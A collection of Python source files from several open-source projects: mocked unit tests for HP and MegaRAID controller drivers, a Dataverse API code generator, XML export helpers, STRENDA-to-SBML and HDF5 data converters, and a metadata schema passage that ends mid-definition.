self.assertRaises(RAIDAbstractionException, self.dummy.create_logical_drive, *args)
def test_abstract(self):
# Silly tests for 'coverage'
self.assertRaises(NotImplementedError, self.abstract.transform_adapter_info, *(0, ))
self.assertRaises(NotImplementedError, self.abstract.create, *(0, 0))
self.assertRaises(NotImplementedError, self.abstract.delete_logical_drive, *(0, 0, 0))
self.assertRaises(NotImplementedError, self.abstract.clear_configuration, *(0, ))
self.assertRaises(NotImplementedError, self.abstract.add_spares,
*(0, 0, None))
self.abstract.sort_drives([0, 1, 2, 3])
def test_get_drives(self):
assert self.dummy.get_unassigned(0)
self.assertRaises(RAIDAbstractionException,
self.dummy.get_unassigned, *(100, )) # invalid adapter
def test_add_index(self):
# Tests that indexes are added to drives
drives = self.dummy.get_all_drives(0)
for idx in range(len(drives)):
assert idx == drives[idx]['index']
```
#### File: unit/raid_abstraction/test_hp.py
```python
import json
import os
import random
import mock
from hpssa.hpssa import Adapter
from mercury_agent.hardware.drivers.hp_raid import (
RAIDAbstractionException,
SmartArrayActions,
SmartArrayDriver
)
from ..base import MercuryAgentUnitTest
def get_adapters():
with open(os.path.join(os.path.dirname(__file__), '../resources/adapters.json')) as fp:
return json.load(fp)
class DummySmartArrayActions(SmartArrayActions):
def __init__(self):
super(SmartArrayActions, self).__init__()
self.hpssa = mock.Mock()
self.hpssa.adapters = [Adapter(**a) for a in get_adapters()]
self.hpssa.create = mock.Mock(return_value=True)
self.hpssa.delete_logical_drive = mock.Mock(return_value=True)
self.hpssa.delete_all_logical_drives = mock.Mock(return_value=True)
self.hpssa.add_spares = mock.Mock(return_value=True)
class DummySmartArrayDriver(SmartArrayDriver):
_handler = DummySmartArrayActions
# noinspection PyMethodMayBeStatic
# noinspection PyMethodOverriding
class MercurySmartArrayDriverTest(MercuryAgentUnitTest):
def setUp(self):
super(MercurySmartArrayDriverTest, self).setUp()
def test_probe(self):
with open(os.path.join(os.path.dirname(__file__), '../resources/pci_data.json')) as fp:
pci_data = json.load(fp)
assert SmartArrayDriver.probe(pci_data)
assert not SmartArrayDriver.probe([])
def test_inspect(self):
with open(os.path.join(os.path.dirname(__file__), '../resources/pci_data.json')) as fp:
pci_data = json.load(fp)
devices = SmartArrayDriver.probe(pci_data)
driver = DummySmartArrayDriver(devices)
data = driver.inspect()
assert data
class MercurySmartArrayActionsTest(MercuryAgentUnitTest):
def setUp(self):
super(MercurySmartArrayActionsTest, self).setUp()
self.dummy_actions = DummySmartArrayActions()
@mock.patch('mercury_agent.hardware.drivers.hp_raid.HPSSA')
@mock.patch('mercury_agent.hardware.drivers.hp_raid.get_configuration')
def test_real_init(self, mock_hpssa, mock_get_configuration):
SmartArrayActions()
def test_missing_array(self):
original = get_adapters()[0]
modified = original.copy()
modified['configuration']['spares'][0]['arrays'] = ['Z'] # doesn't exist
dummy_actions = DummySmartArrayActions()
self.assertRaises(RAIDAbstractionException,
dummy_actions.transform_configuration, *(modified['configuration'], ))
def test_get_slot(self):
assert isinstance(self.dummy_actions.get_slot(self.dummy_actions.get_adapter_info(0)), int)
# Code (Jared) is paranoid and tests for missing vendor info
temp_actions = DummySmartArrayActions()
adapter_info = temp_actions.get_adapter_info(2)
del adapter_info['vendor_info']['slot']
self.assertRaises(RAIDAbstractionException, temp_actions.get_slot, *(adapter_info,))
def test_get_letter_from_index(self):
assert self.dummy_actions.get_letter_from_index(self.dummy_actions.get_adapter_info(0), 0) == 'A'
self.assertRaises(RAIDAbstractionException, self.dummy_actions.get_letter_from_index, *(
self.dummy_actions.get_adapter_info(0), 100))
def test_sort_drives(self):
drives = [
{
'index': 0,
'extra': {
'port': '1I',
'box': '1',
'bay': '1'
}
},
{
'index': 1,
'extra': {
'port': '2I',
'box': '1',
'bay': '1'
}
},
{
'index': 2,
'extra': {
'port': '2I',
'box': '2',
'bay': '1'
}
},
{
'index': 3,
'extra': {
'port': '3I',
'box': '1',
'bay': '1'
}
},
{
'index': 4,
'extra': {
'port': '3I',
'box': '2',
'bay': '1'
}
},
]
random.shuffle(drives)
self.dummy_actions.sort_drives(drives)
for idx in range(5):
assert drives[idx]['index'] == idx
# Free test here testing for missing status
def test_drive_status_failure(self):
drives = [
{
'port': '2I',
'box': '2',
'bay': '1',
'status': '????',
'size': 100
}
]
self.assertRaises(RAIDAbstractionException, self.dummy_actions.transform_physical_drives, *(drives,))
def test_create(self):
assert self.dummy_actions.create_logical_drive(0, '10', [10, 11, 12, 13])
assert self.dummy_actions.create_logical_drive(0, '10', [10, 11, 12, 13], size='10GiB')
assert self.dummy_actions.create_logical_drive(0, '6', array=0)
def test_delete_logical_drive(self):
assert self.dummy_actions.delete_logical_drive(0, 0, 0)
self.assertRaises(RAIDAbstractionException, self.dummy_actions.delete_logical_drive, *(0, 0, 100))
def test_clear_configuration(self):
assert self.dummy_actions.clear_configuration(0)
def test_add_spares(self):
assert self.dummy_actions.add_spares(0, [10, 11])
assert self.dummy_actions.add_spares(0, [10], [0])
def test_get_bad_adapter_info(self):
self.assertRaises(RAIDAbstractionException, self.dummy_actions.get_adapter_info, *(100, ))
def test_get_adapter_info(self):
adapter_info = self.dummy_actions.get_adapter_info(0)
self.assertEqual(adapter_info['total_drives'], 26)
self.assertEqual(adapter_info['total_size'], 7800000000000)
```
#### File: unit/raid_abstraction/test_megaraid.py
```python
import json
import os
import mock
from mercury.common.helpers.cli import CLIResult
from mercury_agent.hardware.drivers.megaraid import MegaRAIDActions, \
MegaRaidSASDriver
from mercury_agent.hardware.raid.abstraction.api import RAIDAbstractionException
from ..base import MercuryAgentUnitTest
def get_storcli_dall_show(c):
""" Gets data from json resource
:param c: unused
:return:
"""
del c
with open(os.path.join(os.path.dirname(__file__),
'../resources/storcli_dall_show.json')) as fp:
data = json.load(fp)
controller_list = []
for controller in data['Controllers']:
# Account for some crazy JSON schema
controller_list.append(
controller['Response Data']['Response Data']
)
return controller_list
def get_controllers():
""" Gets controller information from json resource
:return:
"""
with open(os.path.join(os.path.dirname(__file__),
'../resources/storcli.json')) as fp:
return [c['Response Data'] for c in json.load(fp)['Controllers']]
class DummyMegaRAIDActions(MegaRAIDActions):
""" A dummy megaraid actions driver for easier patching """
def __init__(self):
super(MegaRAIDActions, self).__init__()
self.storcli = mock.Mock()
# controllers is a property
self.storcli.controllers = get_controllers()
self.storcli.get_disk_group = get_storcli_dall_show
class TestMegaRAIDActions(MercuryAgentUnitTest):
""" MegaRAIDActions Test Case """
def setUp(self):
""" Instantiates a dummy module for use in test methods """
super(TestMegaRAIDActions, self).setUp()
self.dummy_actions = DummyMegaRAIDActions()
def test_transform_configuration(self):
""" Test overall transform operations """
configuration = self.dummy_actions.transform_configuration(0)
self.assertTrue(len(configuration['arrays']) == 2)
self.assertEqual(configuration['arrays'][0]['free_space'], 0)
self.assertEqual(
configuration['arrays'][1]['physical_drives'][1]['extra']
['address'], '32:2')
self.assertEqual(
MegaRAIDActions.get_array_index_by_dg(
configuration['arrays'], 1), 1)
self.assertEqual(
MegaRAIDActions.get_array_index_by_dg(
configuration['arrays'], 99), -1)
def test_without_available_drives(self):
dg_info = get_storcli_dall_show(0)
del dg_info[0]['UN-CONFIGURED DRIVE LIST']
new_dummy_actions = DummyMegaRAIDActions()
new_dummy_actions.storcli.get_disk_group = mock.Mock()
new_dummy_actions.storcli.get_disk_group.return_value = dg_info
configuration = new_dummy_actions.transform_configuration(0)
self.assertFalse(configuration['unassigned'])
self.assertFalse(configuration['spares'])
def test_with_global_hotspare(self):
""" Convert stored data so that it contains a GHS"""
dg_info = get_storcli_dall_show(0)
for drive in dg_info[0]['UN-CONFIGURED DRIVE LIST']:
if drive['State'] == 'DHS':
drive['State'] = 'GHS'
drive['DG'] = '-'
new_dummy_actions = DummyMegaRAIDActions()
new_dummy_actions.storcli.get_disk_group = mock.Mock()
new_dummy_actions.storcli.get_disk_group.return_value = dg_info
configuration = new_dummy_actions.transform_configuration(0)
self.assertEqual(configuration['spares'][0]['extra']['spare_type'],
'global')
def test_with_no_hotspare(self):
dg_info = get_storcli_dall_show(0)
for drive in dg_info[0]['UN-CONFIGURED DRIVE LIST']:
if drive['State'] in DummyMegaRAIDActions.hotspare_map:
drive['State'] = 'UGood' # UGood, bro?
drive['DG'] = '-'
new_dummy_actions = DummyMegaRAIDActions()
new_dummy_actions.storcli.get_disk_group = mock.Mock()
new_dummy_actions.storcli.get_disk_group.return_value = dg_info
configuration = new_dummy_actions.transform_configuration(0)
self.assertFalse(configuration['spares'])
def test_transform_adapter_info(self):
adapter_info = self.dummy_actions.transform_adapter_info(0)
self.assertEqual(adapter_info['name'], 'PERC 6/i Integrated')
self.assertEqual(MegaRAIDActions.get_controller_id(adapter_info),
0)
self.assertRaises(RAIDAbstractionException,
self.dummy_actions.transform_adapter_info, *(100,))
@mock.patch('mercury_agent.hardware.raid.interfaces.megaraid.storcli.cli')
@mock.patch('mercury_agent.hardware.drivers.megaraid.get_configuration')
def test_real_init(self, mock_get_configuration, mock_cli):
""" Tests real class __init__ method
:param mock_get_configuration:
:param mock_cli:
:return:
"""
mock_cli.run.return_value = CLIResult('', '', 0)
mock_cli.find_in_path.return_value = '/sbin/storcli64'
mock_get_configuration.return_value = {}
assert MegaRAIDActions()
def test_get_vendor_info_static(self):
""" Tests get_vendor_info static method"""
adapter = {
'Basics': {},
'Version': {},
'Bus': {},
'Status': {},
'Supported Adapter Operations': {},
'Supported PD Operations': {},
'Supported VD Operations': {}
}
result = MegaRAIDActions.get_vendor_info(adapter)
keys = [
'general',
'version_info',
'bus',
'status',
'supported_adapter_ops',
'supported_pd_ops',
'supported_vd_ops',
'bbu_info',
]
missing = []
for key in keys:
if key not in result:
missing.append(key)
self.assertFalse(missing, 'Missing keys in output {}'.format(missing))
def test_sort_drives_static(self):
""" Test drive sorting """
drives = [
{
'extra':
{
'drive_id': 10
}
},
{
'extra':
{
'drive_id': 5
}
},
{
'extra':
{
'drive_id': 7
}
},
{
'extra':
{
'drive_id': 0
}
},
]
MegaRAIDActions.sort_drives(drives)
self.assertEqual(drives[0]['extra']['drive_id'], 0)
self.assertEqual(drives[1]['extra']['drive_id'], 5)
self.assertEqual(drives[2]['extra']['drive_id'], 7)
self.assertEqual(drives[3]['extra']['drive_id'], 10)
def test_create(self):
""" Test create implementation """
# Data does not have available drives, create one
dg_info = get_storcli_dall_show(0)
for drive in dg_info[0]['UN-CONFIGURED DRIVE LIST']:
drive['State'] = 'UGood'
drive['DG'] = '-'
new_dummy_actions = DummyMegaRAIDActions()
new_dummy_actions.storcli.get_disk_group = mock.Mock()
new_dummy_actions.storcli.get_disk_group.return_value = dg_info
adapter_info = new_dummy_actions.transform_adapter_info(0)
drives = new_dummy_actions.get_drives_from_selection(0, [3])
new_dummy_actions.create(adapter_info, 0, drives=drives)
for drive in drives:
drive['extra']['vendor_state'] = 'UBad'
self.assertRaises(RAIDAbstractionException, new_dummy_actions.create,
*(adapter_info, 0, drives))
def test_delete_logical_drive(self):
""" Test delete_logical_drive implementation """
self.dummy_actions.storcli.delete = mock.Mock()
self.dummy_actions.delete_logical_drive(0, 0, 0)
self.dummy_actions.storcli.delete.assert_called_with(**{
'controller': 0,
'virtual_drive': 0
})
self.assertRaises(RAIDAbstractionException,
self.dummy_actions.delete_logical_drive,
*(0, 0, 99))
def test_clear_configuration(self):
self.dummy_actions.storcli.delete = mock.Mock()
self.dummy_actions.clear_configuration(0)
self.dummy_actions.storcli.delete.assert_called_with(
**{
'controller': 0,
'virtual_drive': 'all'
}
)
def test_add_spares(self):
""" Test create implementation """
# Data does not have available drives, create one
dg_info = get_storcli_dall_show(0)
for drive in dg_info[0]['UN-CONFIGURED DRIVE LIST']:
drive['State'] = 'UGood'
drive['DG'] = '-'
new_dummy_actions = DummyMegaRAIDActions()
new_dummy_actions.storcli.get_disk_group = mock.Mock()
new_dummy_actions.storcli.get_disk_group.return_value = dg_info
new_dummy_actions.storcli.add_hotspare = mock.Mock()
new_dummy_actions.add_spares(0, [3])
new_dummy_actions.storcli.add_hotspare.assert_called_with(**{
'controller': 0,
'enclosure': 32,
'slot': 3,
'disk_groups': []
})
new_dummy_actions.add_spares(0, [3], [0])
new_dummy_actions.storcli.add_hotspare.assert_called_with(**{
'controller': 0,
'enclosure': 32,
'slot': 3,
'disk_groups': [0]
})
self.assertRaises(RAIDAbstractionException,
new_dummy_actions.add_spares,
*(0, [3], [99]))
class MercuryMegaRaidDSDriverTest(MercuryAgentUnitTest):
def setUp(self):
super(MercuryMegaRaidDSDriverTest, self).setUp()
self.pci_data = [{'class_id': '0104',
'class_name': 'RAID bus controller',
'device_id': '005d',
'device_name': 'MegaRAID SAS-3 3108 [Invader]',
'driver': 'megaraid_sas',
'revision': '02',
'sdevice_id': '1f49',
'sdevice_name': 'PERC H730 Mini',
'slot': '02:00.0',
'svendor_id': '1028',
'svendor_name': 'Dell',
'vendor_id': '1000',
'vendor_name': 'LSI Logic / Symbios Logic'}]
def test_probe(self):
self.assertEqual(MegaRaidSASDriver.probe(self.pci_data), ['02:00.0'])
@mock.patch('mercury_agent.hardware.raid.interfaces.megaraid.storcli.cli')
@mock.patch('mercury_agent.hardware.drivers.megaraid.get_configuration')
def test_inspect(self, mock_cli, mock_get_configuration):
driver = MegaRaidSASDriver(['02:00.0'])
driver.handler = mock.Mock()
driver.handler.get_adapter_info = mock.Mock()
mock_cli.run.return_value = CLIResult('', '', 0)
mock_cli.find_in_path.return_value = '/sbin/storcli64'
mock_get_configuration.return_value = {}
driver.inspect()
driver.handler.get_adapter_info.assert_called_with(0)
``` |
{
"source": "JR-1991/easyDataverse",
"score": 2
} |
#### File: easyDataverse/easyDataverse/api_generator.py
```python
import argparse
import os
import glob
import yaml
import json
import logging
import coloredlogs
from jinja2 import Template
from typing import Callable
from importlib import resources as pkg_resources
from easyDataverse.tools import templates as jinja_templates
from easyDataverse.tools.clsmod import generate_metadatablock_code
from easyDataverse.tools.restmod import generate_rest_api_code
from easyDataverse.tools.filehandling import create_init_line_metadatblock, create_init_line_library, generate_template
class MyDumper(yaml.Dumper):
"""Used to fix the bad indentation from pyaml"""
def increase_indent(self, flow=False, indentless=False):
return super(MyDumper, self).increase_indent(flow, False)
def main():
parser = argparse.ArgumentParser()
parser.add_argument("-p", "--path", required=True,
type=str, help="Path to the TSV files describing metadatablocks.")
parser.add_argument("-o", "--out", required=True,
type=str, help="Path to which the API will be written.")
parser.add_argument("-n", "--name", required=True,
type=str, help="Name of the generated API.")
parser.add_argument("-l", "--logger", required=False, default="INFO",
type=str, help="Name of the generated API.")
args = vars(parser.parse_args())
# Logger
global logger
logger = logging.getLogger(__name__)
coloredlogs.install(level=args["logger"])
# Parse args to global variables
path = os.path.abspath(os.path.join(args["path"]))
out = os.path.abspath(os.path.join(args["out"]))
name = args["name"]
# Process args
project_path = os.path.join(out, name)
lib_path = os.path.join(out, name, name)
metadatablock_loc = os.path.join(out, name, name, "metadatablocks")
schema_loc = os.path.join(out, name, name, "metadatablocks", "schemas")
template_loc = os.path.join(out, name, name, "templates")
# Create dir structure
os.makedirs(schema_loc, exist_ok=True)
os.makedirs(os.path.join(template_loc, "yaml"), exist_ok=True)
os.makedirs(os.path.join(template_loc, "json"), exist_ok=True)
# Create metadatablock code
metadatablocks(path, metadatablock_loc, schema_loc, lib_path, name)
# Create setup file
setup(name, project_path)
# Create templates
templates(metadatablock_loc, template_loc)
# Generate REST API
generate_rest_api_code(metadatablock_loc, name, lib_path)
logger.info(
f"Created REST-API for {name}"
)
# Generate Dockerfile
docker_template = Template(
pkg_resources.read_text(
jinja_templates, "dockerfile.jinja2"
)
)
docker_out = os.path.join(project_path, "Dockerfile")
with open(docker_out, "w") as f:
f.write(
docker_template.render(lib_name=name)
)
logger.info(
f"Created library {name} in {os.path.abspath(project_path)}"
)
def metadatablocks(path: str, metadatablock_loc: str, schema_loc: str, lib_loc: str, lib_name: str) -> None:
"""Generates the metadatablock relevant files for the API."""
# Generate code for the metadatablocks
for block_path in glob.glob(os.path.join(path, "*.tsv")):
generate_metadatablock_code(block_path, metadatablock_loc, schema_loc)
logger.info(f"Generated metadatablock code for {block_path}")
# Get the correspding module names form the files
module_search = os.path.join(metadatablock_loc, "*.py")
# Write __init__ files
write_imports(
module_search,
lib_loc,
"library_init.jinja2",
create_init_line_library,
lib_name
)
write_imports(
module_search,
metadatablock_loc,
"metadatablock_init.jinja2",
create_init_line_metadatblock,
lib_name
)
def write_imports(
module_search: str,
path: str,
template_path: str,
fun: Callable,
lib_name: str
):
"""Extract module names, creates imports via a function and writes them to a path"""
imports = [
fun(module, lib_name)
for module in glob.glob(module_search)
if "__init__" not in module
]
with open(os.path.join(path, "__init__.py"), "w") as f:
template = Template(
pkg_resources.read_text(jinja_templates, template_path)
)
f.write(template.render(imports=imports, lib_name=lib_name))
def setup(name: str, project_path: str) -> None:
"""Generates the relevant setup file to install the API."""
requirements = [
"easyDataverse",
"fastapi",
"uvicorn",
"pydantic",
"jinja2",
"pyDataverse",
"pandas",
"pyaml"
]
# Initialize Jinja template
template = Template(
pkg_resources.read_text(jinja_templates, "setup.jinja2")
)
# Write to the API directory
setup_path = os.path.join(project_path, "setup.py")
with open(setup_path, "w") as f:
f.write(template.render(name=name, requirements=requirements))
# Write requirements.txt
requirements_path = os.path.join(project_path, "requirements.txt")
with open(requirements_path, "w") as f:
for req in requirements:
f.write(req + "\n")
def templates(metadatablock_loc: str, template_loc: str) -> None:
"""Generates templates which can then be used for mapping from file formats to Dataverse."""
# Get the correspding module names form the files
module_search = os.path.join(metadatablock_loc, "*.py")
for module in glob.glob(module_search):
if "__init__" in module:
continue
# Generate empty data model
block_name, data_model = generate_template(module)
# Write template to YAML
with open(os.path.join(template_loc, "yaml", f"{block_name}.yaml"), "w") as f:
yaml.dump(
data_model, f, sort_keys=False, default_flow_style=False, Dumper=MyDumper
)
# Write template to JSON
with open(os.path.join(template_loc, "json", f"{block_name}.json"), "w") as f:
json.dump(data_model, f, indent=2, sort_keys=False)
logger.info(
f"Created template for {block_name}."
)
if __name__ == "__main__":
main()
```
#### File: easyDataverse/tools/xmltools.py
```python
from typing import Any, Tuple
from lxml import objectify, etree
from sdRDM.tools.utils import snake_to_camel
class XMLWriter:
@classmethod
def to_xml(
cls,
root_name: str,
values: dict,
props: dict,
to_string: bool = True
) -> objectify.ObjectifiedElement:
"""Writes the object data model to XML"""
# Initialize attrib/element mapping
attributes = {}
elements = []
# Collect attributes and elements
for name, value in values.items():
if name.startswith("__"):
continue
# Get xml class and data type
xml, data_type = cls._get_xml_specs(props[name])
# Treat all those cases
if xml == "attribute":
attributes.update({name: str(value)})
elif xml == "element":
elements.append(cls._make_element(
name, value, data_type
))
# Construct resulting element
root = objectify.Element(
root_name,
**attributes
)
root.extend(elements)
# Some cleanups
objectify.deannotate(root)
etree.cleanup_namespaces(root)
if to_string:
xml_string = etree.tostring(
root,
pretty_print=True,
xml_declaration=True
)
return xml_string.decode()
return root
@staticmethod
def _get_xml_specs(properties: dict) -> Tuple[str, str]:
"""Extracts the xml classification and type"""
def infer_property(key: str):
mapping = {
"xml": "element", # Make it an element if not otherwise stated
"type": "object"
}
try:
return properties[key]
except KeyError:
return mapping[key]
return (
infer_property("xml"),
infer_property("type")
)
@staticmethod
def _make_element(name: str, value: Any, data_type: str):
"""Creates elements based on their type and recursively
generated elements from other classes"""
name = snake_to_camel(name)
if data_type not in ["object", "array"]:
# Primitive types
elem = etree.Element(name)
elem.text = str(value)
return elem
# Process nested types
elem = objectify.Element(name)
if data_type == "object":
elem.extend([value.to_xml(to_string=False)])
elif data_type == "array":
elem.extend([entry.to_xml(to_string=False) for entry in value])
else:
raise TypeError(f"Data type of {data_type} is unknown.")
return elem
``` |
{
"source": "JR-1991/EnzymeML",
"score": 2
} |
#### File: enzymeml/strenda/converter.py
```python
import sys
import xml.sax
from libsbml import UNIT_KIND_MOLE, UNIT_KIND_SECOND, \
writeSBMLToFile, writeSBMLToString
from enzymeml import utils
class StrendaHandler(xml.sax.ContentHandler):
'''STRENDA-DB handler.'''
def __init__(self):
xml.sax.ContentHandler.__init__(self)
self.__document, self.__model, self.__compartment = \
utils.get_document()
self.__start = False
self.__element_name = None
self.__species = None
self.__uniprot_id = None
self.__reaction = None
self.__spec_ref = None
self.__kinetic_law = None
self.__reaction_notes = ''
self.__parent = None
def startElement(self, name, attrs):
self.__start = True
self.__element_name = name
if name == 'experiment':
self.__document.setId(attrs['strendaId'])
elif name == 'assayConditions':
self.__parent = name
elif name == 'protein':
self.__uniprot_id = attrs['uniprotKbAC']
elif name == 'dataset':
self.__add_reaction(attrs)
self.__add_protein()
elif name == 'smallCompound':
self.__add_small_compound(name, attrs)
elif name == 'macromolecule':
self.__add_macromolecule(name, attrs)
elif name == 'kineticParameter':
self.__parent = name
elif name == 'value':
self.__add_value(attrs)
def endElement(self, name):
self.__start = False
if name == 'dataset':
if self.__reaction_notes:
utils.set_notes(self.__reaction, self.__reaction_notes.strip())
self.__reaction = None
def characters(self, content):
if self.__start and content.strip() and content != 'null':
if self.__element_name == 'name' and self.__species:
self.__species.setName(content)
elif self.__element_name == 'cid':
utils.add_annotation(
self.__species,
'http://identifiers.org/pubchem.compound/' + content)
elif self.__element_name == 'chebiId':
utils.add_annotation(self.__species,
'http://identifiers.org/chebi/CHEBI:' +
content)
elif self.__element_name == 'inchi':
utils.add_annotation(self.__species,
'http://identifiers.org/inchi/' + content)
elif self.__element_name == 'stoichiometry':
self.__spec_ref.setStoichiometry(float(content))
elif self.__element_name == 'commentOnProteinReaction':
self.__reaction_notes = self.__reaction_notes + content + '\n'
def write_sbml_to_file(self, filename):
'''Write SBML to file.'''
writeSBMLToFile(self.__document, filename)
def write_sbml_to_string(self):
'''Write SBML to string.'''
return writeSBMLToString(self.__document)
def __add_small_compound(self, name, attrs):
'''Add small compound.'''
species_id = utils.get_id(attrs['refId'])
if attrs['role'] == 'Substrate':
self.__species, self.__spec_ref = \
utils.add_substrate(self.__model, self.__reaction,
species_id,
self.__compartment.getId(),
name)
elif attrs['role'] == 'Product':
self.__species, self.__spec_ref = \
utils.add_product(self.__model, self.__reaction,
species_id,
self.__compartment.getId(),
name)
else:
self.__species = \
utils.add_non_participant(self.__model,
species_id,
self.__compartment.getId(),
sbo_term=247)
self.__parent = name
def __add_protein(self):
'''Add protein.'''
species_id = utils.get_id(self.__uniprot_id)
if not self.__model.getSpecies(species_id):
self.__species = utils.add_enzyme(self.__model,
self.__reaction,
species_id,
self.__compartment.getId(),
uniprot_id=self.__uniprot_id)
def __add_macromolecule(self, name, attrs):
'''Add macromolecule.'''
species_id = utils.get_id(attrs['refId'])
sbo_term = 252 if attrs['moleculeClass'] == 'Protein' else 0
self.__species = \
utils.add_non_participant(self.__model,
species_id,
self.__compartment.getId(),
sbo_term=sbo_term)
self.__parent = name
def __add_reaction(self, attrs):
'''Add reaction.'''
self.__reaction = utils.add_reaction(self.__model, attrs['name'])
self.__kinetic_law = self.__reaction.createKineticLaw()
def __add_value(self, attrs):
'''Add value.'''
if attrs['type'] == 'Concentration':
conc, units = self.__get_value_units(float(attrs['value']),
attrs['unit'])
self.__species.setInitialAmount(conc)
self.__species.setUnits(units)
elif attrs['type'] == 'ConcentrationRange':
start_conc, start_units = \
self.__get_value_units(float(attrs['startValue']),
attrs['unit'])
end_conc, end_units = \
self.__get_value_units(float(attrs['endValue']),
attrs['unit'])
self.__species.setInitialAmount(start_conc)
self.__species.setUnits(start_units)
self.__species.setConstant(False)
elif self.__parent == 'kineticParameter':
self.__add_parameter(attrs)
def __add_parameter(self, attrs):
'''Add parameter.'''
value, units = self.__get_value_units(float(attrs['value']),
attrs['unit'])
if attrs['name'] == 'kcat':
sbo_term = 25
elif attrs['name'] == 'km':
sbo_term = 373
else:
sbo_term = 0
utils.add_parameter(self.__kinetic_law, value, units, attrs['name'],
sbo_term)
def __get_value_units(self, value, units):
'''Get value and units.'''
if units == 'mM':
value = value / 10 ** 3
units = 'mole'
elif units == 'microM':
value = value / 10 ** 6
units = 'mole'
elif units == 'nM':
value = value / 10 ** 9
units = 'mole'
elif units == 'units-ml1':
value = value * 10 ** 3
units = 'item'
elif units == 's-1':
unit_def_id = 's_1'
if not self.__model.getUnitDefinition(unit_def_id):
unit_def = self.__model.createUnitDefinition()
unit_def.setId(unit_def_id)
unit_def.setName(unit_def.getName())
unit = unit_def.createUnit()
unit.setScale(1)
unit.setMultiplier(1)
unit.setExponent(-1)
unit.setKind(UNIT_KIND_SECOND)
units = unit_def_id
elif units == 'M-1S-1':
unit_def_id = 'M_1S_1'
if not self.__model.getUnitDefinition(unit_def_id):
unit_def = self.__model.createUnitDefinition()
unit_def.setId(unit_def_id)
unit_def.setName(unit_def.getName())
unit = unit_def.createUnit()
unit.setScale(1)
unit.setMultiplier(1)
unit.setExponent(1)
unit.setKind(UNIT_KIND_MOLE)
unit = unit_def.createUnit()
unit.setScale(1)
unit.setMultiplier(1)
unit.setExponent(-1)
unit.setKind(UNIT_KIND_SECOND)
units = unit_def_id
return value, units
def convert(in_filename, out_filename='strenda_sbml.xml'):
'''Convert file.'''
parser = xml.sax.make_parser()
handler = StrendaHandler()
parser.setContentHandler(handler)
with open(in_filename, 'r') as fle:
parser.parse(fle)
handler.write_sbml_to_file(out_filename)
def main(args):
'''main method.'''
convert(*args)
if __name__ == '__main__':
main(sys.argv[1:])
```
#### File: EnzymeML/hdf5/converter.py
```python
import re
import sys
import h5py
import numpy as np
import pandas as pd
def convert(in_filename, out_filename='out.hdf5'):
'''Convert Pandas to hdf5.'''
df = pd.read_csv(in_filename, sep='\t', dtype=np.float64)
df.name = 'timeseries'
# Remove hashtag:
df.columns = [re.sub(r'#\s+', '', col) for col in df.columns]
# Set index to be time:
df.set_index('Time', inplace=True)
# Remove empty columns:
df.dropna(axis=1, how='all', inplace=True)
# Write to hdf5:
df.to_hdf(out_filename, key=df.name, format='table', data_columns=True,
mode='w')
return out_filename
def read_hdf(filename):
'''Read hdf5 file.'''
fle = h5py.File(filename, 'r')
for key, value in fle.items():
print(key, value, value.attrs.keys())
for key, val in value.items():
print(key, val, val.attrs.keys())
def main(args):
'''main method.'''
out_filename = convert(*args)
read_hdf(out_filename)
# Write to csv:
pd.read_hdf(out_filename).to_csv('out.csv')
if __name__ == '__main__':
main(sys.argv[1:])
``` |
{
"source": "JR-1991/pyDaRUS",
"score": 3
} |
#### File: pyDaRUS/metadatablocks/engMeta.py
```python
from __future__ import annotations
from enum import Enum
from typing import List, Optional, Union
from easyDataverse.core import DataverseBase
from pydantic import Field
class DataGeneration(Enum):
"""
Approach to data generation
"""
simulation = 'Simulation'
analysis = 'Analysis'
experiment = 'Experiment'
prediction = 'Prediction'
class SystemParameters(DataverseBase):
name: Optional[str] = Field(
None,
description='Name of the parameter.',
multiple=False,
typeClass='primitive',
typeName='engMetaSystemParName',
)
symbol: Optional[str] = Field(
None,
description='The symbol used to describe this parameter.',
multiple=False,
typeClass='primitive',
typeName='engMetaSystemParSymbol',
)
unit: Optional[str] = Field(
None,
description='The unit or scale of this parameter.',
multiple=False,
typeClass='primitive',
typeName='engMetaSystemParUnit',
)
value: Optional[float] = Field(
None,
description='The (numerical) value of this parameter.',
multiple=False,
typeClass='primitive',
typeName='engMetaSystemParValue',
)
textual_value: Optional[str] = Field(
None,
description='The value of this system parameter (for non numerical values).',
multiple=False,
typeClass='primitive',
typeName='engMetaSystemParTextValue',
)
class MeasuredVariables(DataverseBase):
name: Optional[str] = Field(
None,
description='Name of this variable.',
multiple=False,
typeClass='primitive',
typeName='engMetaMeasuredVarName',
)
symbol: Optional[str] = Field(
None,
description='The symbol used to describe this variable.',
multiple=False,
typeClass='primitive',
typeName='engMetaMeasuredVarSymbol',
)
unit: Optional[str] = Field(
None,
description='The unit or scale of this variable.',
multiple=False,
typeClass='primitive',
typeName='engMetaMeasuredVarUnit',
)
error: Optional[float] = Field(
None,
description='A value for the uncertainty of this variable.',
multiple=False,
typeClass='primitive',
typeName='engMetaMeasuredVarError',
)
error_description: Optional[str] = Field(
None,
description='The type the error is measured (e.g. standard deviation, percentage, …)',
multiple=False,
typeClass='primitive',
typeName='engMetaMeasuredVarErrorDesc',
)
minimum_value: Optional[float] = Field(
None,
description='The minimum value of this variable (use for ranges)',
multiple=False,
typeClass='primitive',
typeName='engMetaMeasuredVarValueFrom',
)
maximum_value: Optional[float] = Field(
None,
description='The maximum value of this variable (use for ranges)',
multiple=False,
typeClass='primitive',
typeName='engMetaMeasuredVarValueTo',
)
textual_value: Optional[str] = Field(
None,
description='The value of this measured variable (for non numerical values).',
multiple=False,
typeClass='primitive',
typeName='engMetaMeasuredVarTextValue',
)
class SystemOrPhaseComponents(DataverseBase):
id: Optional[int] = Field(
None,
description='Unique number that can be referred to in the metadata. Use if Name is not unique.',
multiple=False,
typeClass='primitive',
typeName='engMetaCompId',
)
name: Optional[str] = Field(
None,
description='Name of this component.',
multiple=False,
typeClass='primitive',
typeName='engMetaCompName',
)
description: Optional[str] = Field(
None,
description='Description of the component.',
multiple=False,
typeClass='primitive',
typeName='engMetaCompDescription',
)
inchicode: Optional[str] = Field(
None,
description='The IUPAC International Chemical Identifier',
multiple=False,
typeClass='primitive',
typeName='engMetaCompInChI',
)
smilescode: Optional[str] = Field(
None,
description='Simplified Molecular Input Line Entry Specification',
multiple=False,
typeClass='primitive',
typeName='engMetaCompSmilesCode',
)
iupac_name: Optional[str] = Field(
None,
description='Chemical nomenclature created and developed by the International Union of Pure and Applied Chemistry (IUPAC)',
multiple=False,
typeClass='primitive',
typeName='engMetaCompIUPAC',
)
quantity: Optional[str] = Field(
None,
description='The amount of this component.',
multiple=False,
typeClass='primitive',
typeName='engMetaCompQuantity',
)
unit: Optional[str] = Field(
None,
